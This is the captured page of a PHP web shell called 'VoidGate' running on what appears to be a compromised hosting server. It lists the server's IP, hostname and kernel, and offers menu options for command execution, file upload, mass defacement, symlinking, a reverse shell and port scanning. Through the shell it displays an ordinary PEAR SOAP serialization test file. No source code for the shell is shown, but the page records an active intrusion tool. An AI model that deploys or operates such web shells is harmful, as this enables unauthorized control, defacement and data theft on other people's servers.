ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
php
/
tests
/
SOAP
/
tests
/
serialize
/
Viewing: struct_1.phpt
--TEST-- Serialize typed struct --FILE-- <?php require_once dirname(__FILE__) . '/../test.utility.php'; require_once 'SOAP/Client.php'; $soap_client = new SOAP_Client(''); $p = array( new SOAP_Value( 'inputStruct', 'Struct', array(new SOAP_Value('age', 'int', 45), new SOAP_Value('height', 'float', 5.9), new SOAP_Value('displacement', 'negativeInteger', -450), new SOAP_Value('color', 'string', 'Blue')))); echo $soap_client->_generate('echoStruct', $p); ?> --EXPECT-- <?xml version="1.0" encoding="UTF-8"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <echoStruct> <inputStruct> <age xsi:type="xsd:int">45</age> <height xsi:type="xsd:float">5.9</height> <displacement xsi:type="xsd:negativeInteger">-450</displacement> <color xsi:type="xsd:string">Blue</color></inputStruct></echoStruct> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
Coded With 💗 by
0x6ick